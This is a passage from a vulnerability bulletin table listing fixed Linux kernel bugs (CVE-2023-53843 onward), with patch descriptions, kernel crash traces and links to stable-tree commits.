netlink/specs/ovs_vport.yaml \ --do new \ --json '{"upcall-pid": "00000001", "name": "some-port0", "dp-ifindex":3,"ifindex":4294901760,"type":2}' lib.ynl.NlError: Netlink error: Numerical result out of range nl_len = 108 (92) nl_flags = 0x300 nl_type = 2 error: -34 extack: {'msg': 'integer out of range', 'unknown': [[type:4 len:36] b'\x0c\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x03\x00\xff\xff\xff\x7f\x00\x00\x00\x00\x08\x00\x01\x00\x08\x00\x00\x00'], 'bad-attr': '.ifindex'} Accept 0 since it used to be silently ignored. | 2025-12-09 | not yet calculated | CVE-2023-53843 | https://git.kernel.org/stable/c/c965a58376146dcfdda186819462e8eb3aadef3a https://git.kernel.org/stable/c/881faff9e548a7ddfb11595be7c1c649217d27db https://git.kernel.org/stable/c/a552bfa16bab4ce901ee721346a28c4e483f4066 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/ttm: Don't leak a resource on swapout move error If moving the bo to system for swapout failed, we were leaking a resource. Fix. | 2025-12-09 | not yet calculated | CVE-2023-53844 | https://git.kernel.org/stable/c/af4e0ce2af8a8f0ff3b89702a1e18d8ec2c4a834 https://git.kernel.org/stable/c/f037f6038736bd038ddb9c72de979a08cc1ee3b5 https://git.kernel.org/stable/c/4a5b37ea6797d7a53e6dd004aa37e149f40199ce https://git.kernel.org/stable/c/a590f03d8de7c4cb7ce4916dc7f2fd10711faabe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix infinite loop in nilfs_mdt_get_block() If the disk image that nilfs2 mounts is corrupted and a virtual block address obtained by block lookup for a metadata file is invalid, nilfs_bmap_lookup_at_level() may return the same internal return code as -ENOENT, meaning the block does not exist in the metadata file. This duplication of return codes confuses nilfs_mdt_get_block(), causing it to read and create a metadata block indefinitely. In particular, if this happens to the inode metadata file, ifile, semaphore i_rwsem can be left held, causing task hangs in lock_mount. Fix this issue by making nilfs_bmap_lookup_at_level() treat virtual block address translation failures with -ENOENT as metadata corruption instead of returning the error code. | 2025-12-09 | not yet calculated | CVE-2023-53845 | https://git.kernel.org/stable/c/cfb0bb4fbd40c1f06da7e9f88c0a2d46155b90c2 https://git.kernel.org/stable/c/d536f9976bb04e9c84cf80045a9355975e418f41 https://git.kernel.org/stable/c/fe1cbbcb1a2532ee1654e1ff121be8906d83c6f0 https://git.kernel.org/stable/c/8a89d36a07afe1ed4564df51fefa2bb556c85412 https://git.kernel.org/stable/c/8d07d9119642ba43d21f8ba64d51d01931096b20 https://git.kernel.org/stable/c/25457d07c8146e57d28906c663def033dc425af6 https://git.kernel.org/stable/c/34c5f17222b50c79848bb03ec8811648813e6a45 https://git.kernel.org/stable/c/5b29661669cb65b9750a3cf70ed3eaf947b92167 https://git.kernel.org/stable/c/a6a491c048882e7e424d407d32cba0b52d9ef2bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on direct node in truncate_dnode() syzbot reports below bug: BUG: KASAN: slab-use-after-free in f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574 Read of size 4 at addr ffff88802a25c000 by task syz-executor148/5000 CPU: 1 PID: 5000 Comm: syz-executor148 Not tainted 6.4.0-rc7-syzkaller-00041-ge660abd551f1 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106 print_address_description.constprop.0+0x2c/0x3c0 mm/kasan/report.c:351 print_report mm/kasan/report.c:462 [inline] kasan_report+0x11c/0x130 mm/kasan/report.c:572 f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574 truncate_dnode+0x229/0x2e0 fs/f2fs/node.c:944 f2fs_truncate_inode_blocks+0x64b/0xde0 fs/f2fs/node.c:1154 f2fs_do_truncate_blocks+0x4ac/0xf30 fs/f2fs/file.c:721 f2fs_truncate_blocks+0x7b/0x300 fs/f2fs/file.c:749 f2fs_truncate.part.0+0x4a5/0x630 fs/f2fs/file.c:799 f2fs_truncate include/linux/fs.h:825 [inline] f2fs_setattr+0x1738/0x2090 fs/f2fs/file.c:1006 notify_change+0xb2c/0x1180 fs/attr.c:483 do_truncate+0x143/0x200 fs/open.c:66 handle_truncate fs/namei.c:3295 [inline] do_open fs/namei.c:3640 [inline] path_openat+0x2083/0x2750 fs/namei.c:3791 do_filp_open+0x1ba/0x410 fs/namei.c:3818 do_sys_openat2+0x16d/0x4c0 fs/open.c:1356 do_sys_open fs/open.c:1372 [inline] __do_sys_creat fs/open.c:1448 [inline] __se_sys_creat fs/open.c:1442 [inline] __x64_sys_creat+0xcd/0x120 fs/open.c:1442 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The root cause is, inodeA references inodeB via inodeB's ino, once inodeA is truncated, it calls truncate_dnode() to truncate data blocks in inodeB's node page, it traverse mapping data from node->i.i_addr[0] to node->i.i_addr[ADDRS_PER_BLOCK() - 1], result in out-of-boundary access. This patch fixes to add sanity check on dnode page in truncate_dnode(), so that, it can help to avoid triggering such issue, and once it encounters such issue, it will record newly introduced ERROR_INVALID_NODE_REFERENCE error into superblock, later fsck can detect such issue and try repairing. Also, it removes f2fs_truncate_data_blocks() for cleanup due to the function has only one caller, and uses f2fs_truncate_data_blocks_range() instead. | 2025-12-09 | not yet calculated | CVE-2023-53846 | https://git.kernel.org/stable/c/af0f716ad3b039cab9d426da63a5ee6c88751185 https://git.kernel.org/stable/c/a6ec83786ab9f13f25fb18166dee908845713a95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb-storage: alauda: Fix uninit-value in alauda_check_media() Syzbot got KMSAN to complain about access to an uninitialized value in the alauda subdriver of usb-storage: BUG: KMSAN: uninit-value in alauda_transport+0x462/0x57f0 drivers/usb/storage/alauda.c:1137 CPU: 0 PID: 12279 Comm: usb-storage Not tainted 5.3.0-rc7+ #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 Call Trace: __dump_stack lib/dump_stack.c:77 [inline] dump_stack+0x191/0x1f0 lib/dump_stack.c:113 kmsan_report+0x13a/0x2b0 mm/kmsan/kmsan_report.c:108 __msan_warning+0x73/0xe0 mm/kmsan/kmsan_instr.c:250 alauda_check_media+0x344/0x3310 drivers/usb/storage/alauda.c:460 The problem is that alauda_check_media() doesn't verify that its USB transfer succeeded before trying to use the received data. What should happen if the transfer fails isn't entirely clear, but a reasonably conservative approach is to pretend that no media is present. A similar problem exists in a usb_stor_dbg() call in alauda_get_media_status(). In this case, when an error occurs the call is redundant, because usb_stor_ctrl_transfer() already will print a debugging message. Finally, unrelated to the uninitialized memory access, is the fact that alauda_check_media() performs DMA to a buffer on the stack. Fortunately usb-storage provides a general purpose DMA-able buffer for uses like this. We'll use it instead. | 2025-12-09 | not yet calculated | CVE-2023-53847 | https://git.kernel.org/stable/c/153c3e85873cc3e2f387169783c3a227bad9a95a https://git.kernel.org/stable/c/49d380bcd6cba987c6085fae6464c9c087e8d9a0 https://git.kernel.org/stable/c/044f4446e06bb03c52216697b14867ebc555ad3b https://git.kernel.org/stable/c/fe7c3a445d22783d27fe8bd0521a8aab1eb9da65 https://git.kernel.org/stable/c/7a11d1e2625bdb2346f6586773b20b20977278ac https://git.kernel.org/stable/c/0d2d5282d39aed6f27dfe1ed60a5f3934ebd21cd https://git.kernel.org/stable/c/373e0ab8c4c516561493f1acf367c7ee7dc053c2 https://git.kernel.org/stable/c/a6ff6e7a9dd69364547751db0f626a10a6d628d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5-cache: fix a deadlock in r5l_exit_log() Commit b13015af94cf ("md/raid5-cache: Clear conf->log after finishing work") introduce a new problem: // caller hold reconfig_mutex r5l_exit_log flush_work(&log->disable_writeback_work) r5c_disable_writeback_async wait_event /* * conf->log is not NULL, and mddev_trylock() * will fail, wait_event() can never pass. */ conf->log = NULL Fix this problem by setting 'config->log' to NULL before wake_up() as it used to be, so that wait_event() from r5c_disable_writeback_async() can exist. In the meantime, move forward md_unregister_thread() so that null-ptr-deref this commit fixed can still be fixed. | 2025-12-09 | not yet calculated | CVE-2023-53848 | https://git.kernel.org/stable/c/ac9e103f282a7854f3274ef5ff0742fbbe8d7d6b https://git.kernel.org/stable/c/71cf23271f015a57038bdc4669952096f9fe5500 https://git.kernel.org/stable/c/c406984738215dc20ac2dc63e49d70f20797730e https://git.kernel.org/stable/c/a705b11b358dee677aad80630e7608b2d5f56691 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: fix workqueue leak on bind errors Make sure to destroy the workqueue also in case of early errors during bind (e.g. a subcomponent failing to bind). Since commit c3b790ea07a1 ("drm: Manage drm_mode_config_init with drmm_") the mode config will be freed when the drm device is released also when using the legacy interface, but add an explicit cleanup for consistency and to facilitate backporting. Patchwork: https://patchwork.freedesktop.org/patch/525093/ | 2025-12-09 | not yet calculated | CVE-2023-53849 | https://git.kernel.org/stable/c/6e1476225ec02eeebc4b79f793506f80bc4bca8f https://git.kernel.org/stable/c/28e34db2f3e0130872e2384dd9df9f82bd89e967 https://git.kernel.org/stable/c/8551c4b7c8ffb42f759547e5c39da5980abf2432 https://git.kernel.org/stable/c/a75b49db6529b2af049eafd938fae888451c3685 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: use internal state to free traffic IRQs If the system tries to close the netdev while iavf_reset_task() is running, __LINK_STATE_START will be cleared and netif_running() will return false in iavf_reinit_interrupt_scheme(). This will result in iavf_free_traffic_irqs() not being called and a leak as follows: [7632.489326] remove_proc_entry: removing non-empty directory 'irq/999', leaking at least 'iavf-enp24s0f0v0-TxRx-0' [7632.490214] WARNING: CPU: 0 PID: 10 at fs/proc/generic.c:718 remove_proc_entry+0x19b/0x1b0 is shown when pci_disable_msix() is later called. Fix by using the internal adapter state. The traffic IRQs will always exist if state == __IAVF_RUNNING. | 2025-12-09 | not yet calculated | CVE-2023-53850 | https://git.kernel.org/stable/c/6d9d01689b82ff5cb8f8d2a82717d7997bc0bfff https://git.kernel.org/stable/c/5e9db32eec628481f5da97a5b1aedb84a5240d18 https://git.kernel.org/stable/c/a77ed5c5b768e9649be240a2d864e5cd9c6a2015 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dp: Drop aux devices together with DP controller Using devres to depopulate the aux bus made sure that upon a probe deferral the EDP panel device would be destroyed and recreated upon next attempt. But the struct device which the devres is tied to is the DPUs (drm_dev->dev), which may be happen after the DP controller is torn down. Indications of this can be seen in the commonly seen EDID-hexdump full of zeros in the log, or the occasional/rare KASAN fault where the panel's attempt to read the EDID information causes a use after free on DP resources. It's tempting to move the devres to the DP controller's struct device, but the resources used by the device(s) on the aux bus are explicitly torn down in the error path. The KASAN-reported use-after-free also remains, as the DP aux "module" explicitly frees its devres-allocated memory in this code path. As such, explicitly depopulate the aux bus in the error path, and in the component unbind path, to avoid these issues. Patchwork: https://patchwork.freedesktop.org/patch/542163/ | 2025-12-09 | not yet calculated | CVE-2023-53851 | https://git.kernel.org/stable/c/e09ed06938807cb113cddd0708ed74bd8cdaff33 https://git.kernel.org/stable/c/2fde37445807e6e6d7981402d0bf1be0e5d81291 https://git.kernel.org/stable/c/a7bfb2ad2184a1fba78be35209b6019aa8cc8d4d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-core: fix memory leak in dhchap_secret_store Free dhchap_secret in nvme_ctrl_dhchap_secret_store() before we return fix following kmemleack:- unreferenced object 0xffff8886376ea800 (size 64): comm "check", pid 22048, jiffies 4344316705 (age 92.199s) hex dump (first 32 bytes): 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL backtrace: [<0000000030ce5d4b>] __kmalloc+0x4b/0x130 [<000000009be1cdc1>] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core] [<00000000ac06c96a>] kernfs_fop_write_iter+0x12b/0x1c0 [<00000000437e7ced>] vfs_write+0x2ba/0x3c0 [<00000000f9491baf>] ksys_write+0x5f/0xe0 [<000000001c46513d>] do_syscall_64+0x3b/0x90 [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc unreferenced object 0xffff8886376eaf00 (size 64): comm "check", pid 22048, jiffies 4344316736 (age 92.168s) hex dump (first 32 bytes): 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL backtrace: [<0000000030ce5d4b>] __kmalloc+0x4b/0x130 [<000000009be1cdc1>] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core] [<00000000ac06c96a>] kernfs_fop_write_iter+0x12b/0x1c0 [<00000000437e7ced>] vfs_write+0x2ba/0x3c0 [<00000000f9491baf>] ksys_write+0x5f/0xe0 [<000000001c46513d>] do_syscall_64+0x3b/0x90 [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc | 2025-12-09 | not yet calculated | CVE-2023-53852 | https://git.kernel.org/stable/c/2e9b141307554521d60fecf6bf1d2edc8dd0181d https://git.kernel.org/stable/c/c41ac086d2abaf7527a5685f9c0a1c209ab7e0aa https://git.kernel.org/stable/c/6a5eda5017959541ab82c5d56bcf784b8294e298 https://git.kernel.org/stable/c/a836ca33c5b07d34dd5347af9f64d25651d12674 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netlink: annotate accesses to nlk->cb_running Both netlink_recvmsg() and netlink_native_seq_show() read nlk->cb_running locklessly. Use READ_ONCE() there. Add corresponding WRITE_ONCE() to netlink_dump() and __netlink_dump_start() syzbot reported: BUG: KCSAN: data-race in __netlink_dump_start / netlink_recvmsg write to 0xffff88813ea4db59 of 1 bytes by task 28219 on cpu 0: __netlink_dump_start+0x3af/0x4d0 net/netlink/af_netlink.c:2399 netlink_dump_start include/linux/netlink.h:308 [inline] rtnetlink_rcv_msg+0x70f/0x8c0 net/core/rtnetlink.c:6130 netlink_rcv_skb+0x126/0x220 net/netlink/af_netlink.c:2577 rtnetlink_rcv+0x1c/0x20 net/core/rtnetlink.c:6192 netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline] netlink_unicast+0x56f/0x640 net/netlink/af_netlink.c:1365 netlink_sendmsg+0x665/0x770 net/netlink/af_netlink.c:1942 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg net/socket.c:747 [inline] sock_write_iter+0x1aa/0x230 net/socket.c:1138 call_write_iter include/linux/fs.h:1851 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x463/0x760 fs/read_write.c:584 ksys_write+0xeb/0x1a0 fs/read_write.c:637 __do_sys_write fs/read_write.c:649 [inline] __se_sys_write fs/read_write.c:646 [inline] __x64_sys_write+0x42/0x50 fs/read_write.c:646 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd read to 0xffff88813ea4db59 of 1 bytes by task 28222 on cpu 1: netlink_recvmsg+0x3b4/0x730 net/netlink/af_netlink.c:2022 sock_recvmsg_nosec+0x4c/0x80 net/socket.c:1017 ____sys_recvmsg+0x2db/0x310 net/socket.c:2718 ___sys_recvmsg net/socket.c:2762 [inline] do_recvmmsg+0x2e5/0x710 net/socket.c:2856 __sys_recvmmsg net/socket.c:2935 [inline] __do_sys_recvmmsg net/socket.c:2958 [inline] __se_sys_recvmmsg net/socket.c:2951 [inline] __x64_sys_recvmmsg+0xe2/0x160 net/socket.c:2951 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd value changed: 0x00 -> 0x01 | 2025-12-09 | not yet calculated | CVE-2023-53853 | https://git.kernel.org/stable/c/e25e9d8a210ed78bdf0f364576dbee13aefadbf8 https://git.kernel.org/stable/c/840a647499b093621167de56ffa8756dfc69f242 https://git.kernel.org/stable/c/a507022c862e10744a92c4bf5709775450a110ad https://git.kernel.org/stable/c/f92557f79a60cb142258f5fa7194f327573fadd8 https://git.kernel.org/stable/c/1d5c8b01f1df0461256a6d75854ed806f50645a3 https://git.kernel.org/stable/c/a115dadf8995b1730c36c474401d97355705cb88 https://git.kernel.org/stable/c/02e7afd659a4c9ce1e98fc01ab4c510f3de1f0b3 https://git.kernel.org/stable/c/a939d14919b799e6fff8a9c80296ca229ba2f8a4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: mediatek: mt8186: Fix use-after-free in driver remove path When devm runs function in the "remove" path for a device it runs them in the reverse order. That means that if you have parts of your driver that aren't using devm or are using "roll your own" devm w/ devm_add_action_or_reset() you need to keep that in mind. The mt8186 audio driver didn't quite get this right. Specifically, in mt8186_init_clock() it called mt8186_audsys_clk_register() and then went on to call a bunch of other devm function. The caller of mt8186_init_clock() used devm_add_action_or_reset() to call mt8186_deinit_clock() but, because of the intervening devm functions, the order was wrong. Specifically at probe time, the order was: 1. mt8186_audsys_clk_register() 2. afe_priv->clk = devm_kcalloc(...) 3. afe_priv->clk[i] = devm_clk_get(...) At remove time, the order (which should have been 3, 2, 1) was: 1. mt8186_audsys_clk_unregister() 3. Free all of afe_priv->clk[i] 2. Free afe_priv->clk The above seemed to be causing a use-after-free. Luckily, it's easy to fix this by simply using devm more correctly. Let's move the devm_add_action_or_reset() to the right place. In addition to fixing the use-after-free, code inspection shows that this fixes a leak (missing call to mt8186_audsys_clk_unregister()) that would have happened if any of the syscon_regmap_lookup_by_phandle() calls in mt8186_init_clock() had failed. | 2025-12-09 | not yet calculated | CVE-2023-53854 | https://git.kernel.org/stable/c/3e56a1c04882852e3e7d6c59756a16211ebbc457 https://git.kernel.org/stable/c/dffd9e2b57cb845930fa885aa634a847ba2130dd https://git.kernel.org/stable/c/a93d2afd3f77a7331271a0f25c6a11003db69b3c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: ocelot: call dsa_tag_8021q_unregister() under rtnl_lock() on driver remove When the tagging protocol in current use is "ocelot-8021q" and we unbind the driver, we see this splat: $ echo '0000:00:00.2' > /sys/bus/pci/drivers/fsl_enetc/unbind mscc_felix 0000:00:00.5 swp0: left promiscuous mode sja1105 spi2.0: Link is Down DSA: tree 1 torn down mscc_felix 0000:00:00.5 swp2: left promiscuous mode sja1105 spi2.2: Link is Down DSA: tree 3 torn down fsl_enetc 0000:00:00.2 eno2: left promiscuous mode mscc_felix 0000:00:00.5: Link is Down ------------[ cut here ]------------ RTNL: assertion failed at net/dsa/tag_8021q.c (409) WARNING: CPU: 1 PID: 329 at net/dsa/tag_8021q.c:409 dsa_tag_8021q_unregister+0x12c/0x1a0 Modules linked in: CPU: 1 PID: 329 Comm: bash Not tainted 6.5.0-rc3+ #771 pc : dsa_tag_8021q_unregister+0x12c/0x1a0 lr : dsa_tag_8021q_unregister+0x12c/0x1a0 Call trace: dsa_tag_8021q_unregister+0x12c/0x1a0 felix_tag_8021q_teardown+0x130/0x150 felix_teardown+0x3c/0xd8 dsa_tree_teardown_switches+0xbc/0xe0 dsa_unregister_switch+0x168/0x260 felix_pci_remove+0x30/0x60 pci_device_remove+0x4c/0x100 device_release_driver_internal+0x188/0x288 device_links_unbind_consumers+0xfc/0x138 device_release_driver_internal+0xe0/0x288 device_driver_detach+0x24/0x38 unbind_store+0xd8/0x108 drv_attr_store+0x30/0x50 ---[ end trace 0000000000000000 ]--- ------------[ cut here ]------------ RTNL: assertion failed at net/8021q/vlan_core.c (376) WARNING: CPU: 1 PID: 329 at net/8021q/vlan_core.c:376 vlan_vid_del+0x1b8/0x1f0 CPU: 1 PID: 329 Comm: bash Tainted: G W 6.5.0-rc3+ #771 pc : vlan_vid_del+0x1b8/0x1f0 lr : vlan_vid_del+0x1b8/0x1f0 dsa_tag_8021q_unregister+0x8c/0x1a0 felix_tag_8021q_teardown+0x130/0x150 felix_teardown+0x3c/0xd8 dsa_tree_teardown_switches+0xbc/0xe0 dsa_unregister_switch+0x168/0x260 felix_pci_remove+0x30/0x60 pci_device_remove+0x4c/0x100 device_release_driver_internal+0x188/0x288 device_links_unbind_consumers+0xfc/0x138 device_release_driver_internal+0xe0/0x288 device_driver_detach+0x24/0x38 unbind_store+0xd8/0x108 drv_attr_store+0x30/0x50 DSA: tree 0 torn down This was somewhat not so easy to spot, because "ocelot-8021q" is not the default tagging protocol, and thus, not everyone who tests the unbinding path may have switched to it beforehand. The default felix_tag_npi_teardown() does not require rtnl_lock() to be held. | 2025-12-09 | not yet calculated | CVE-2023-53855 | https://git.kernel.org/stable/c/758dbcfb257e1aee0a310bae789c2af6ffe35d0f https://git.kernel.org/stable/c/7ae8fa6b70975b6efbbef7912d09bff5a0bff491 https://git.kernel.org/stable/c/a94c16a2fda010866b8858a386a8bfbeba4f72c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: overlay: Call of_changeset_init() early When of_overlay_fdt_apply() fails, the changeset may be partially applied, and the caller is still expected to call of_overlay_remove() to clean up this partial state. However, of_overlay_apply() calls of_resolve_phandles() before init_overlay_changeset(). Hence if the overlay fails to apply due to an unresolved symbol, the overlay_changeset.cset.entries list is still uninitialized, and cleanup will crash with a NULL-pointer dereference in overlay_removal_is_ok(). Fix this by moving the call to of_changeset_init() from init_overlay_changeset() to of_overlay_fdt_apply(), where all other early initialization is done. | 2025-12-09 | not yet calculated | CVE-2023-53856 | https://git.kernel.org/stable/c/01bb96ad38089f5cc6de7746dac13437d35eb1dc https://git.kernel.org/stable/c/3fb210cd521c9efcb211e9f5ce40fc907200bf13 https://git.kernel.org/stable/c/be86241bf5d1efd16d8a7231c13b33459c5d755d https://git.kernel.org/stable/c/c403c81b577a67fe9ec6a2e89d143256487be50f https://git.kernel.org/stable/c/a9515ff4fb142b690a0d2b58782b15903b990dba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: bpf_sk_storage: Fix invalid wait context lockdep report './test_progs -t test_local_storage' reported a splat: [ 27.137569] ============================= [ 27.138122] [ BUG: Invalid wait context ] [ 27.138650] 6.5.0-03980-gd11ae1b16b0a #247 Tainted: G O [ 27.139542] ----------------------------- [ 27.140106] test_progs/1729 is trying to lock: [ 27.140713] ffff8883ef047b88 (stock_lock){-.-.}-{3:3}, at: local_lock_acquire+0x9/0x130 [ 27.141834] other info that might help us debug this: [ 27.142437] context-{5:5} [ 27.142856] 2 locks held by test_progs/1729: [ 27.143352] #0: ffffffff84bcd9c0 (rcu_read_lock){....}-{1:3}, at: rcu_lock_acquire+0x4/0x40 [ 27.144492] #1: ffff888107deb2c0 (&storage->lock){..-.}-{2:2}, at: bpf_local_storage_update+0x39e/0x8e0 [ 27.145855] stack backtrace: [ 27.146274] CPU: 0 PID: 1729 Comm: test_progs Tainted: G O 6.5.0-03980-gd11ae1b16b0a #247 [ 27.147550] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 27.149127] Call Trace: [ 27.149490] <TASK> [ 27.149867] dump_stack_lvl+0x130/0x1d0 [ 27.152609] dump_stack+0x14/0x20 [ 27.153131] __lock_acquire+0x1657/0x2220 [ 27.153677] lock_acquire+0x1b8/0x510 [ 27.157908] local_lock_acquire+0x29/0x130 [ 27.159048] obj_cgroup_charge+0xf4/0x3c0 [ 27.160794] slab_pre_alloc_hook+0x28e/0x2b0 [ 27.161931] __kmem_cache_alloc_node+0x51/0x210 [ 27.163557] __kmalloc+0xaa/0x210 [ 27.164593] bpf_map_kzalloc+0xbc/0x170 [ 27.165147] bpf_selem_alloc+0x130/0x510 [ 27.166295] bpf_local_storage_update+0x5aa/0x8e0 [ 27.167042] bpf_fd_sk_storage_update_elem+0xdb/0x1a0 [ 27.169199] bpf_map_update_value+0x415/0x4f0 [ 27.169871] map_update_elem+0x413/0x550 [ 27.170330] __sys_bpf+0x5e9/0x640 [ 27.174065] __x64_sys_bpf+0x80/0x90 [ 27.174568] do_syscall_64+0x48/0xa0 [ 27.175201] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 [ 27.175932] RIP: 0033:0x7effb40e41ad [ 27.176357] Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d8 [ 27.179028] RSP: 002b:00007ffe64c21fc8 EFLAGS: 00000202 ORIG_RAX: 0000000000000141 [ 27.180088] RAX: ffffffffffffffda RBX: 00007ffe64c22768 RCX: 00007effb40e41ad [ 27.181082] RDX: 0000000000000020 RSI: 00007ffe64c22008 RDI: 0000000000000002 [ 27.182030] RBP: 00007ffe64c21ff0 R08: 0000000000000000 R09: 00007ffe64c22788 [ 27.183038] R10: 0000000000000064 R11: 0000000000000202 R12: 0000000000000000 [ 27.184006] R13: 00007ffe64c22788 R14: 00007effb42a1000 R15: 0000000000000000 [ 27.184958] </TASK> It complains about acquiring a local_lock while holding a raw_spin_lock. It means it should not allocate memory while holding a raw_spin_lock since it is not safe for RT. raw_spin_lock is needed because bpf_local_storage supports tracing context. In particular for task local storage, it is easy to get a "current" task PTR_TO_BTF_ID in tracing bpf prog. However, task (and cgroup) local storage has already been moved to bpf mem allocator which can be used after raw_spin_lock. The splat is for the sk storage. For sk (and inode) storage, it has not been moved to bpf mem allocator. Using raw_spin_lock or not, kzalloc(GFP_ATOMIC) could theoretically be unsafe in tracing context. However, the local storage helper requires a verifier accepted sk pointer (PTR_TO_BTF_ID), it is hypothetical if that (mean running a bpf prog in a kzalloc unsafe context and also able to hold a verifier accepted sk pointer) could happen. This patch avoids kzalloc after raw_spin_lock to silent the splat. There is an existing kzalloc before the raw_spin_lock. At that point, a kzalloc is very likely required because a lookup has just been done before. Thus, this patch always does the kzalloc before acq ---truncated--- | 2025-12-09 | not yet calculated | CVE-2023-53857 | https://git.kernel.org/stable/c/300415caa373a07782fcbc2f8d9429bc2dc27a47 https://git.kernel.org/stable/c/a96a44aba556c42b432929d37d60158aca21ad4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: samsung_tty: Fix a memory leak in s3c24xx_serial_getclk() in case of error If clk_get_rate() fails, the clk that has just been allocated needs to be freed. | 2025-12-09 | not yet calculated | CVE-2023-53858 | https://git.kernel.org/stable/c/755289d67eb9a74ae71bb624902e979c66859444 https://git.kernel.org/stable/c/f47e6631a8fcc6fe05b8644aa4222a60f3b0a927 https://git.kernel.org/stable/c/30962268fa1a7466413b3d83037688129021d470 https://git.kernel.org/stable/c/a49e5a05121c8bc471a57b4916c5393749c24de5 https://git.kernel.org/stable/c/073dbbe5743779faf24f233cc95459b47c7198dd https://git.kernel.org/stable/c/34f5b826dd509b76644f83094b4af7e7668a6a38 https://git.kernel.org/stable/c/1694fc8ad734e2909a9e40d2be03cc4423e0bee6 https://git.kernel.org/stable/c/a9c09546e903f1068acfa38e1ee18bded7114b37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/idle: mark arch_cpu_idle() noinstr linux-next commit ("cpuidle: tracing: Warn about !rcu_is_watching()") adds a new warning which hits on s390's arch_cpu_idle() function: RCU not on for: arch_cpu_idle+0x0/0x28 WARNING: CPU: 2 PID: 0 at include/linux/trace_recursion.h:162 arch_ftrace_ops_list_func+0x24c/0x258 Modules linked in: CPU: 2 PID: 0 Comm: swapper/2 Not tainted 6.2.0-rc6-next-20230202 #4 Hardware name: IBM 8561 T01 703 (z/VM 7.3.0) Krnl PSW : 0404d00180000000 00000000002b55c0 (arch_ftrace_ops_list_func+0x250/0x258) R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:1 PM:0 RI:0 EA:3 Krnl GPRS: c0000000ffffbfff 0000000080000002 0000000000000026 0000000000000000 0000037ffffe3a28 0000037ffffe3a20 0000000000000000 0000000000000000 0000000000000000 0000000000f4acf6 00000000001044f0 0000037ffffe3cb0 0000000000000000 0000000000000000 00000000002b55bc 0000037ffffe3bb8 Krnl Code: 00000000002b55b0: c02000840051 larl %r2,0000000001335652 00000000002b55b6: c0e5fff512d1 brasl %r14,0000000000157b58 #00000000002b55bc: af000000 mc 0,0 >00000000002b55c0: a7f4ffe7 brc 15,00000000002b558e 00000000002b55c4: 0707 bcr 0,%r7 00000000002b55c6: 0707 bcr 0,%r7 00000000002b55c8: eb6ff0480024 stmg %r6,%r15,72(%r15) 00000000002b55ce: b90400ef lgr %r14,%r15 Call Trace: [<00000000002b55c0>] arch_ftrace_ops_list_func+0x250/0x258 ([<00000000002b55bc>] arch_ftrace_ops_list_func+0x24c/0x258) [<0000000000f5f0fc>] ftrace_common+0x1c/0x20 [<00000000001044f6>] arch_cpu_idle+0x6/0x28 [<0000000000f4acf6>] default_idle_call+0x76/0x128 [<00000000001cc374>] do_idle+0xf4/0x1b0 [<00000000001cc6ce>] cpu_startup_entry+0x36/0x40 [<0000000000119d00>] smp_start_secondary+0x140/0x150 [<0000000000f5d2ae>] restart_int_handler+0x6e/0x90 Mark arch_cpu_idle() noinstr like all other architectures with CONFIG_ARCH_WANTS_NO_INSTR (should) have it to fix this. | 2025-12-09 